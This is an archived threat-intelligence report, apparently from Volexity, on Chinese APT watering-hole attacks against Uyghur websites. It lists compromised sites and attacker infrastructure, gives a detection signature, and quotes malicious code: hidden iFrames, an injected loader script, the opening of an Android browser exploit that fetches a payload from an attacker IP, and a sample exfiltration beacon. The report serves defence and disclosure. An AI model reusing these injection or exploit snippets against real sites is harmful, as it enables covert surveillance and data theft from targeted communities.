{ "id": "93f168fe-33c9-46e9-91e1-4ad39066987b", "created_at": "2026-04-06T00:06:59.649171Z", "updated_at": "2026-04-10T13:13:07.921426Z", "deleted_at": null, "sha1_hash": "ad91d3efae76faa98431bbe86aa84213bc217c7b", "title": "Digital Crackdown: Large-Scale Surveillance and Exploitation of Uyghurs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 435513, "plain_text": "Digital Crackdown: Large-Scale Surveillance and Exploitation of\r\nUyghurs\r\nBy mindgrub\r\nPublished: 2019-09-02 · Archived: 2026-04-05 12:49:32 UTC\r\nOver the last several years, numerous reports have emerged regarding the shocking treatment of Uyghurs, a Muslim\r\nminority ethnic group that makes up a large part of the Xinjiang Uyghur Autonomous Region (XUAR) in northwest China.\r\nThe Uyghur people, especially those that want the XUAR to become its own nation under the name East Turkistan, are\r\nconsidered to be a threat to the Chinese Communist Party (CCP). Recent reporting has shown that this point of view by the\r\nCCP against the Uyghur people has resulted in wide-scale harassment, relocation to detention camps, and oppressive high-tech surveillance aimed at tracking physical movements and behavior. With all of these reports on physical real-world\r\nissues, it should come as no surprise that cyberspace has become a battle ground for the Uyghur people. The level of\r\nsurveillance occurring in China against Uyghurs extends well beyond their borders and has fully entered the digital realm. In\r\nthis blog, Volexity plans to shed some light on the barrage of cyber attacks that have been unleashed upon Uyghurs.\r\nSince its formation in 2013, Volexity has worked closely with various non-governmental organizations (NGOs), activists,\r\ndissidents, human rights defenders, and other highly targeted groups that are often at a severe disadvantage with respect to\r\nthe threat actors that are targeting them. Volexity’s goal is to always level the playing field as much as possible through\r\nawareness and by collaboratively building more defensible and resilient networks and systems. Over the years, Volexity has\r\ngained amazing insight into what could be considered to be some of the most advanced and scariest cyber attacks\r\nimaginable.  Volexity has worked closely with various Uyghur individuals and organizations and has witnessed an\r\nunrelenting series of attacks that started well before 2013 and continue to this day. In the last few years, Volexity has\r\nobserved an increase in the number of compromised Uyghur and East Turkistan websites. These websites have been\r\nleveraged to track and launch attacks against the Uyghur diaspora around the world. This report details the wide variety of\r\nwebsites that have been used for surveillance and attacks and specifically looks into a very recent campaign targeting mobile\r\ndevices.\r\nKey highlights from these most recent series of attacks against the Uyghur diaspora include:\r\nA wide-ranging series of digital surveillance and exploitation campaigns identified via multiple strategically\r\ncompromised websites\r\nMobile device users running Android OS targeted via an exploit that will deliver a 64-bit ARM executable\r\nWebsite visitors tracked and targeted via Scanbox profiling and exploitation framework\r\nAttacker’s arsenal includes Google Applications for gaining access to e-mails and contact lists of Gmail accounts via\r\nOAuth\r\nDoppelganger domains emulating Google, the Turkistan Times, and the Uyghur Academy leveraged by attackers\r\nAt least two separate Chinese APT groups responsible for ongoing campaigns against Uyghurs\r\nAs part of these ongoing attacks, Volexity has identified at least 11 Uyghur and East Turkistan related websites that have\r\nbeen compromised and leveraged for surveillance and exploitation. While this number is definitely less than that observed\r\nby Volexity as part of a mass digital surveillance campaign by OceanLotus a few years ago, these websites do make up a\r\nsignificant number of the total websites that provide Uyghur and East Turkistan news and resources. Volexity believes that\r\nthe attacks described in the post are designed to target Uyghurs at large, of which the majority will be members of the\r\nUyghur diaspora. The systematic targeting and compromise websites that are run by and cater to Uyghurs make it clear they\r\nare the primary targets. However, each of the compromised websites are banned by the great firewall in China, leaving\r\nlargely only those outside of the country as targets and potential victims.\r\nhttps://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/\r\nPage 1 of 9\n\nCompromised Sites\r\nVolexity has been able to identify at least 11 different Uyghur and East Turkistan websites that have been strategically\r\ncompromised and leveraged as part of a series of attack campaigns. In some cases, the websites have been continuously\r\nleveraged to attack visitors going back at least four years. While it is not always possible to tie some observed activity to a\r\nspecific threat group, Volexity believes that at least two Chinese APT groups are responsible for the majority of the attack\r\nactivity described in this blog.\r\nOrganization Website Compromised Page\r\nUyghur Academy www.akademiye.org\r\nMain Index\r\n/ug/wp-content/themes/goodnews/js/custom.js?ver=1.0/ug/wp-content/themes/goodnews/js/Jplayer.html (iFrame)\r\nTurkistantimes turkistantimes.com\r\nDirectly on select pages such as:\r\n/en/news-10597.html\r\n/m/news-10500.html\r\nUighur Times (English) uighurtimes.com Main Index\r\nUighur Times (Chinese) weiwuer.com Main Index\r\nUighur Times (Uyghur) iuyghur.com Main Index\r\nIstiqlal Haber istiqlalhaber.com /js/jquery.easing.1.3.js\r\nTurkistan Press turkistanpress.com /js/jquery.easing.1.3.js\r\nTurkistan TV turkistantv.com /js/lightbox/css/lightbox.html (iFrame)\r\nEast Turkistan\r\nEducation and\r\nSolidarity\r\nAssociation (ETESA)\r\nmaarip.org Main index pages for English and Uyghur versions of the website\r\nWorld Uyghurs Writers\r\nUnion\r\nwetinim.com Main Index\r\nIstiqlal TV istiqlal.net Main index\r\nUnauthorized Code\r\nThe websites listed above all contained one or more instances of malicious code on them. The code was often updated over\r\ntime and some websites even housed multiple different instances of malicious code at the same time. The majority of the\r\nwebsites that were linked to by the malicious code were unavailable when Volexity examined them or returned 0-byte\r\nresponses. The latter indicating that whitelisting may be employed or that the attack operation was otherwise on pause or\r\nbeing leveraged to simply track visitors.  The primary instances where code was returned involved the deployment of\r\nScanbox by one actor and exploit code targeting Android users by another.\r\nEvil Eye\r\nIn many cases where the malicious websites were in operation but Volexity did not observe an active payload, the URLs\r\nfollowed a somewhat distinctive pattern. In almost all instances, the URLs from these sites were loaded via an iFrame.\r\nBelow is a list of the observed URL patterns, as extracted from the iFrame tags.\r\nhttp://103.43.18.243:5634/WU95IhiPIMsg.html\r\nhttp://182.61.171.167:9321/8fmtCI2j2Xk0.html\r\nhttp://182.61.173.209:8372/uxwrR64eZz0Y.html\r\nhttp://45.76.209.90:8352/reA4iy3gl2.html\r\nhttps://www.google-analysis.info/UxiZIwIcsta2.html\r\nhttps://www.google-analysis.info/NsyXHDkBR2yK.html\r\nhttps://turkistantlmes.com/aNQBEaMX2Bc4.html\r\nhttps://turkistantlmes.com/7GbMYn8ldTRK.html\r\nhttps://akademlye.org/t5UPArzQAjd2.html\r\nThese URLs are typically loaded in plaintext without any sort of obfuscation. However, in two instances, one of the earlier\r\ninstances identified on the Uyghur Academy website, and one on the website of the World Uyghurs Writers Union,\r\nobfuscation was applied by way of multiple iFrames, and with the URL itself being obfuscated. An example of the\r\nobfuscated code as found on the World Uyghurs Writers Union site is shown below.\r\nhttps://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/\r\nPage 2 of 9\n\n\u003ciframe\r\nsrc=”\u0026#x68;\u0026#x74;\u0026#x74;\u0026#x70;\u0026#x3a;\u0026#x2f;\u0026#x2f;\u0026#x31;\u0026#x30;\u0026#x33;\u0026#x2e;\u0026#x34;\u0026#x33;\u0026#x2e;\u0026#x31;\u0026#x38;\u0026#x2e;\u0026#x32;\u0026#x34;\u0026\r\nwidth=0 height=0\u003e\u003c/iframe\u003e\r\nOnce converted, the above iFrame will attempt to load content from http://103.43.18.243:5634/WU95IhiPIMsg.html.\r\nVolexity has also observed similar URL patterns and even doppelganger domains leveraged to target Tibetan interests as\r\nwell. Volexity believes there is likely overlap between these two sets of activity.  Volexity currently tracks the above listed\r\nactivity as a group under the moniker Evil Eye. The Evil Eye threat actor is also responsible for targeting users with Android\r\nexploits and malware, which is detailed below within this report.\r\nScanbox\r\nAnother notable instance of code found on these compromised websites includes the aforementioned Scanbox instance that\r\nwas seen in istiqlal.net. The following code was observed on the site for a period of time in mid-April 2019.\r\n\u003cscript src=”https://stats.uyghurmedia[.]top:443/i/?3″\u003e\u003c/script\u003e\r\nThe script would load the Scanbox framework, collecting data on the system and transmitting it via HTTP POST request to\r\nstats.uyghurmedia[.]top:443/i/recv.php.\r\nIn this instance, the attackers leveraged both a domain they created in an effort to blend in as legitimate and TLS to evade\r\nnetwork detection. This domain also has ties to an operation designed to target Google OAuth access to Gmail accounts as\r\ndescribed further in this report. This is not the first time Volexity has observed Scanbox leveraged in attacks against the\r\nUyghur community. In 2016, Volexity had identified a similar Scanbox instance on the Uyghur Academy website.\r\nIP in Decimal Notation\r\nOne of the more interesting versions of unauthorized code that Volexity observed was on the website of the World Uyghurs\r\nWriters Union. The following code was observed on the website:\r\n\u003cscript type=”text/javascript”\u003e !function(a,b)\r\n{a=document.createElement(“script”),b=document.getElementsByTagName(“script”)[0],\r\na.async=!0,a.src=”//760037399/2″,b.parentNode.insertBefore(a,b)}()\r\nIn this case, the value “760037399” converts to the Choopa IP address 45.77.64.23 and a request is made to the URL\r\nhttp://45.77.64.23/2. Volexity believes this code has primarily been leveraged for tracking, as it will ultimately report back a\r\nfew pieces of information to the site to include its referer and possibly even cookies. Volexity has previously observed this\r\nsame IP decimal notation and tracking code on other sites in the past.\r\nAndroid Mobile Users Targeted\r\nIn mid-August, Volexity identified new malicious code on the websites of the Uyghur Academy, Turkistan Press, Turkistan\r\nTV, and Istiqlal Haber. The websites contained a few different methods of loading the following code:\r\n\u003ciframe src=”https://akademlye[.]org/ztTXvf” width 0 height 0 visibility hidden\u003e\u003c/iframe\u003e\r\nThis malicious domain that was designed to appear like the legitimate website of the Uyghur Academy. However, in this\r\ninstance the “i” has been replaced with a lowercase “L.” This follows a similar theme to that was seen via the\r\n“turkistantlmes[.]com” website leveraged by the attackers. The code on this website appears to target the Chrome browser of\r\nthe Android operating system.\r\nThe initial code of the exploit contained the following, which was actually fairly well documented through comments:\r\n\u003chtml\u003e\r\n\u003cscript\u003e\r\nvar IP_A12A3079E14CED46E69BA52B8A90B21A = “149.28.207.244”;\r\nvar IP_HEX_06236F18F5EA830A8DBB2AA5E5AC4E00 = “0xf4cf1c95”;  // 4c08a8c0\r\nvar PORT_463C00141B4C3A7F76ACD3540052F8F5 = 8080;\r\nvar APP_PATH_D892A52BCC30FA6168C260B8695D24F7 = “/data/data/com.android.browser/loader”;\r\nvar portshell=parseInt((PORT_463C00141B4C3A7F76ACD3540052F8F5/256+\r\n(PORT_463C00141B4C3A7F76ACD3540052F8F5%256)*256))*256*256+2;\r\nvar s=”GET /dev/loader HTTP/1.0\\r\\nHost: “+\r\nIP_A12A3079E14CED46E69BA52B8A90B21A+”:”+PORT_463C00141B4C3A7F76ACD3540052F8F5.toString()+”\\r\\nConnection:\r\nclose\\r\\n\\r\\n”;\r\nThe exploit itself is 22,963 bytes of code and if successful will ultimately result in the forced download of a file name\r\nloader to the /data/data/com.android.browser directory of the victim device. This aforementioned file is downloaded via the\r\nURL 149.28[.]207.244:8080/dev/loader. The file loader is a 64-bit ARM executable that exfiltrates a significant amount of\r\nhttps://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/\r\nPage 3 of 9\n\ndata about the device back to attacker controlled IP via an HTTP POST request to 149.28.207.244 over TCP port 1998. The\r\nconnection will use a hard-coded user agent of Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)\r\nGecko/20100101Firefox/65.0 for the request and will also notably send an Accept-Language of “zh-CN” (Chinese).\r\nThe information exfiltrated about the device includes the following:\r\nUnique ID\r\nModel\r\nBrand\r\nManufacturer\r\nLocale\r\nIMEI\r\nSIM state\r\nIMSI\r\nICCID\r\nPhone number\r\nRoaming status\r\nBaseband version\r\nCurrent network type\r\nCurrent network name\r\nOperator code\r\nBattery level\r\nWhether the phone is rooted\r\nROM version\r\nAndroid version\r\nAndroid API level\r\nAndroid patch version\r\nAndroid ID\r\nKernel version\r\nMAC address\r\nPublic and private IP addresses\r\nTotal and free space on SD card\r\nTotal and free RAM\r\nDevice fingerprint\r\nSerial number\r\nScreen resolution\r\nCPU\r\nUptime\r\nUsername\r\nThe malware binary also makes use of a unique website to check its IP address by making a GET request to  the domain\r\ngetip[.]name (150.109.120.186). This website was registered in February 2019 and does not appear to have a web presence.\r\nThe site has been down on all occasions that Volexity has checked it. Additionally, there do not appear to be any other\r\nknown hostnames that resolve to the websites IP address. Volexity believes it is possible that this domain is controlled by the\r\nattackers.\r\nInformation about the status of exfiltration requests and other diagnostic information is attempted to be logged to a file\r\nnamed loader.log in the /data/data/com.android.browser directory on the device. While this file serves as a useful\r\nindicator of the presence of the malware, we note that the loader executable will continue functioning even if it cannot write\r\nto its log file. A sample of what a beacon packet looks like is included below.\r\nPOST /link/detail HTTP/1.1\r\nHost: 149.28.207.244\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0\r\nAccept: */*\r\nAccept-Language: zh-CN\r\nCache-Control: no-cache\r\nConnection: close\r\nContent-length: 976\r\n{“device_id”:”0f637264fc6318a92b9e13c65dc1cd2c”,”model”:”Android SDK built for\r\narm64″,”brand”:”Android”,”manufacturer”:”unknown”,”locale”:”en-US”,”imei”:”358240051111123″,”sim_state”:”READY”,”imsi”:”310260000001809″,”iccid”:”89014103211138560721″,”phone_no”:”+15555215554\r\n11-\r\n05″,”android_id”:”d0a79d8f32e69c86″,”kernel_version”:”3.10.0+”,”mac_address”:”02:03:04:05:60:07″,”ip_public”:””,”ip_private”:””,”sdcard_total”\r\nhttps://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/\r\nPage 4 of 9\n\nkeys”,”serial_no”:”PD2C1PR328X0X23X0″,”resolution”:”1440*2560″,”cpu_info”:” AArch64 Processor rev 0\r\n(aarch64)”,”uptime”:”1643″,”user”:”root”}\r\nThe sample analyzed by Volexity does not appear to have any means of persisting on the system that it’s running on, nor\r\ndoes it appear to accept further commands. Volexity suspects that this may indicate that attackers may look to conduct future\r\nexploitation of  devices of interest or are otherwise looking  to use this data to verify information obtained from the output of\r\nphysical cellular device tracking.\r\nVolexity has identified similarities to but has not yet verified that the exploit being employed in this attack is the Chrome\r\nTurbofan remote code execution vulnerability that was reported via the SecuriTeam Secure Disclosure program and is\r\ncovered in an advisory here.\r\nTargeting Gmail Access via Google OAuth\r\nAn increasingly common tactic that Volexity sees from various APT groups, especially those aimed at targeted populations,\r\nincluding dissidents and individuals involved with human rights, is to gain long-term access to their personal e-mail\r\naccounts. One such way is to develop an application and fool a targeted user into authorizing it to have access to their e-mail\r\naccount. This will typically bypass two-factor authentication (2FA) and provide the attacker resilience against user password\r\nchanges. Volexity previously describe this type of attack and steps to mitigate as part of a blog related to OceanLotus here.\r\nWhile investigating the domain name uyghurmedia[.]top, that was described above as targeting Uyghurs through Scanbox,\r\nVolexity found it was also being leveraged to target Gmail accounts via the hostname emailgroup.uyghurmedia.top.\r\nAccessing this hostname will result in a redirect to a Google application setup to gain unauthorized access to the Gmail\r\naccounts of Uyghurs.  The application will warn you about what is about to happen, describe the permissions the application\r\nwould have over the account, and then make you confirm this is what you actually want to do as shown in the image below.\r\nhttps://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/\r\nPage 5 of 9\n\nA closer look at the developer information of the application also gives insight into the account used to create and manage\r\nthe application as seen below.\r\nhttps://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/\r\nPage 6 of 9\n\nThe attackers leveraged the e-mail address uygurye2008@gmail.com as part of this campaign. Any e-mail from this\r\naccount should be considered highly suspect and likely malicious. If access is granted, an e-mail should be sent and a new\r\nevent should show up under Google’s Security Checkup. The application in this instance will show up as the “Uyghur Media\r\nEmail Group” as seen below.\r\nFurthermore, an access to the account is made nearly immediately from the Choopa IP address 45.32.190.160. Note: is the\r\nsame IP address to which the above hostname resolves .\r\nAny access from this IP address should be considered suspect and likely malicious.\r\nPossible Ties to Apple iPhone Attacks\r\nLess than a week ago Google’s Project Zero posted a detailed analysis of a series of iPhone exploits and related malware\r\nthat had been identified by their Threat Analysis Group earlier in the year. This post does not give any specific details into\r\nhttps://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/\r\nPage 7 of 9\n\nwhere the exploits were observed but it does seem to hint that it may have been via Uyghur-related websites. A short time\r\nlater, TechCrunch ran an article confirming that Uyghurs were the targets and references a post by Forbes providing\r\nadditional details regarding the targeting of Android and Windows. While Volexity can only confirm malware targeted\r\nAndroid users through Uyghurs websites, it is reasonable to suspect that these same attack campaigns could have easily been\r\nleveraged to target Apple and Microsoft users. Furthermore, Volexity has a couple of additional observations of note:\r\nShortly after Google’s Project Zero blog, the three DNS names leveraged by Evil Eye (akademyle.org,\r\nturkistantlmes.com, and google-analysis.info) stopped resolving\r\nAround the same time or shortly before this blog, a number of the websites Volexity lists as compromised above\r\nstarted showing Google Safebrowsing warnings in Google search results\r\nThe majority of the malicious scripts referenced on the compromised websites were removed in this same timeframe\r\nFinally, Volexity also observed one notable bit of code that was short-lived on the Uyghur Academy website that may\r\nindicate a possible interest in targeting iPhone users. The following code was observed in October 2018:\r\n\u003ciframe src=”http://app.msap[.]services/appsstore” style=”\r\nwidth: 0px;\r\nheight:0px;\r\nborder:none;\r\npadding:0;\r\n“\u003e\u003c/iframe\u003e\r\nWhile this is not a smoking gun, it is interesting to note the use of “appsstore” as part of the URL. Volexity also notes that it\r\nhas seen the msap.services domain leveraged to target Tibetan individuals as well.\r\nAttacker Infrastructure\r\nHostname IPv4 Address Notes\r\nwww.google-analysis[.]info 182.61.106.160\r\nAttacker controlled domain found on multiple Uyghur and East\r\nTurkistan websites.\r\nturkistantlmes[.]com 182.61.189.138\r\nAttacker controlled domain found on multiple Uyghur and East\r\nTurkistan websites.\r\nakademlye[.]org 149.28.207.244\r\nAttacker controlled domain leveraged to deliver Android exploit\r\nand malware. The IP for this domain is also used for direct\r\ncommunication from the Evil Eye Android loader.\r\najax.cloudflarestatic.tk N/A Malicious domain found on the compromised ETESA site\r\nmaarip.org; currently does not resolve to an IP address\r\napp.msap.services 144.202.59.23 Malicious domain previously observed on the compromised\r\nUyghur Academy website akademiye.org.\r\narkinixik.ezua.com 149.248.57.231\r\nHostname observed in a malicious URL found on the compromised\r\nEast Turkistan news website istiqlalhaber.com. This hostname is\r\nalso tied to a series of other hostnames and domains used to target\r\nUyghurs going back over five years.\r\nstats.uyghurmedia.top 139.180.223.184 Hostname observed hosting Scanbox via istiqlal.net in April 2019.\r\ngetip.name 150.109.120.186 Domain used by Android malware to identify its public IP address.\r\nemailgroup.uyghurmedia.top 45.32.190.160\r\nHostname found to be leveraged to trick users into giving OAuth\r\naccess to their Gmail accounts.\r\nd.scanvpn.com 142.4.50.213\r\nThe IP address was observed in a malicious URL found on the\r\ncompromised ETESA site maarip.org. The hostname\r\nd.scanvpn.com also resolves to this IP address. This is believed to\r\nbe quite old.\r\nN/A 182.61.184.33 Previous IP address resolution for turkistantlmes.com\r\nN/A 182.61.171.167\r\nIP address observed in a malicious URL found on the compromised\r\nwebsite istiqlalhaber.com\r\nN/A 182.61.173.209\r\nIP address observed in a malicious URL found on the compromised\r\nwebsite akademiye.org.\r\nhttps://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/\r\nPage 8 of 9\n\nN/A 182.61.176.128 Previous IP address resolution for turkistantlmes.com\r\nN/A 45.76.209.90\r\nIP address observed in a malicious URL found on the compromised\r\nwebsite akademiye.org.\r\nN/A 45.77.64.23\r\nIP address observed in a malicious URL found on the compromised\r\nsite wetinim.com.\r\nNetwork Signature\r\nIn addition to the domains and IP addresses, the following network signature can be used to detect the Evil Eye Android\r\nMalware.\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:”Volex –  Evil Eye Android Malware Beacon”;\r\nflow:to_server,established; content:”POST”; http_method; content:”Mozilla/5.0 (Windows NT 10.0|3b| Win64|3b|\r\nx64|3b| rv:65.0) Gecko/20100101 Firefox/65.0″; http_user_agent; content:”Accept-Language: zh-CN”;\r\nhttp_header; content:”device_id”; http_client_body; depth:15; sid:2019090101;)\r\nConclusion\r\nThe Uyghur population is and will continue to be a major target for Chinese APT groups. While Uyghurs living within\r\nChina are already subject to numerous forms of physical and electronic surveillance, it reasonable to expect they have also\r\nbeen targeted for digital surveillance. However, as the sites listed in this post are actually blocked in China,  it can be seen\r\nthat the Uyghur diaspora around the world are also primary targets of these digital surveillance operations. These operations\r\ncan be used to track the movements of Uyghurs outside of China and spy on those they are communicating with. Volexity\r\nbelieves that China has continued to increase the level of effort and sophistication they have put into targeting Uyghurs. As a\r\nresult, it is critically important that Uyghurs take into consideration when using their computers and mobile devices that they\r\nmay have been targeted and compromised, especially if the websites listed above are frequented.\r\nSource: https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/\r\nhttps://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "ETDA", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/" ], "report_names": [ "digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs" ], "threat_actors": [ { "id": "f0ebaf6d-5e1a-4ed7-aa2c-0e69a648acea", "created_at": "2022-10-25T16:07:23.597455Z", "updated_at": "2026-04-10T02:00:04.683154Z", "deleted_at": null, "main_name": "Evil Eye", "aliases": [], "source_name": "ETDA:Evil Eye", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "af509bbb-8d18-4903-a9bd-9e94099c6b30", "created_at": "2023-01-06T13:46:38.585525Z", "updated_at": "2026-04-10T02:00:03.030833Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "OceanLotus", "ATK17", "G0050", "APT-C-00", "APT-32", "Canvas Cyclone", "SeaLotus", "Ocean Buffalo", "OceanLotus Group", "Cobalt Kitty", "Sea Lotus", "APT 32", "POND LOACH", "TIN WOODLAWN", "Ocean Lotus" ], "source_name": "MISPGALAXY:APT32", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "870f6f62-84f5-48ca-a18e-cf2902cd6924", "created_at": "2022-10-25T15:50:23.303818Z", "updated_at": "2026-04-10T02:00:05.301184Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "APT32", "SeaLotus", "OceanLotus", "APT-C-00", "Canvas Cyclone" ], "source_name": "MITRE:APT32", "tools": [ "Mimikatz", "ipconfig", "Kerrdown", "Cobalt Strike", "SOUNDBITE", "OSX_OCEANLOTUS.D", "KOMPROGO", "netsh", "RotaJakiro", "PHOREAL", "Arp", "Denis", "Goopy" ], "source_id": "MITRE", "reports": null }, { "id": "52973e5f-9656-4b60-b7f8-457e32ac4bbe", "created_at": "2023-01-06T13:46:39.056888Z", "updated_at": "2026-04-10T02:00:03.198866Z", "deleted_at": null, "main_name": "POISON CARP", "aliases": [ "Evil Eye", "Red Dev 16", "Earth Empusa" ], "source_name": "MISPGALAXY:POISON CARP", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d2a5c949-7ae0-4610-8bb8-047ab03b1574", "created_at": "2022-10-25T16:07:24.064197Z", "updated_at": "2026-04-10T02:00:04.856578Z", "deleted_at": null, "main_name": "Poison Carp", "aliases": [ "Earth Empusa", "Evil Eye", "EvilBamboo", "Poison Carp", "Red Dev 16", "Sentinel Taurus" ], "source_name": "ETDA:Poison Carp", "tools": [ "ActionSpy", "AxeSpy", "BADSIGNAL", "BADSOLAR", "BadBazaar", "IRONSQUIRREL", "IceCube", "MOONSHINE", "PoisonCarp" ], "source_id": "ETDA", "reports": null }, { "id": "5da6b5fd-1955-412a-81aa-069fb50b6e31", "created_at": "2025-08-07T02:03:25.116085Z", "updated_at": "2026-04-10T02:00:03.668978Z", "deleted_at": null, "main_name": "TIN WOODLAWN", "aliases": [ "APT32 ", "Cobalt Kitty", "OceanLotus", "WOODLAWN " ], "source_name": "Secureworks:TIN WOODLAWN", "tools": [ "Cobalt Strike", "Denis", "Goopy", "JEShell", "KerrDown", "Mimikatz", "Ratsnif", "Remy", "Rizzo", "RolandRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2439ad53-39cc-4fff-8fdf-4028d65803c0", "created_at": "2022-10-25T16:07:23.353204Z", "updated_at": "2026-04-10T02:00:04.55407Z", "deleted_at": null, "main_name": "APT 32", "aliases": [ "APT 32", "APT-C-00", "APT-LY-100", "ATK 17", "G0050", "Lotus Bane", "Ocean Buffalo", "OceanLotus", "Operation Cobalt Kitty", "Operation PhantomLance", "Pond Loach", "SeaLotus", "SectorF01", "Tin Woodlawn" ], "source_name": "ETDA:APT 32", "tools": [ "Agentemis", "Android.Backdoor.736.origin", "AtNow", "Backdoor.MacOS.OCEANLOTUS.F", "BadCake", "CACTUSTORCH", "CamCapture Plugin", "CinaRAT", "Cobalt Strike", "CobaltStrike", "Cuegoe", "DKMC", "Denis", "Goopy", "HiddenLotus", "KOMPROGO", "KerrDown", "METALJACK", "MSFvenom", "Mimikatz", "Nishang", "OSX_OCEANLOTUS.D", "OceanLotus", "PHOREAL", "PWNDROID1", "PhantomLance", "PowerSploit", "Quasar RAT", "QuasarRAT", "RatSnif", "Remy", "Remy RAT", "Rizzo", "Roland", "Roland RAT", "SOUNDBITE", "Salgorea", "Splinter RAT", "Terracotta VPN", "Yggdrasil", "cobeacon", "denesRAT", "fingerprintjs2" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434019, "ts_updated_at": 1775826787, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ad91d3efae76faa98431bbe86aa84213bc217c7b.pdf", "text": "https://archive.orkl.eu/ad91d3efae76faa98431bbe86aa84213bc217c7b.txt", "img": "https://archive.orkl.eu/ad91d3efae76faa98431bbe86aa84213bc217c7b.jpg" } }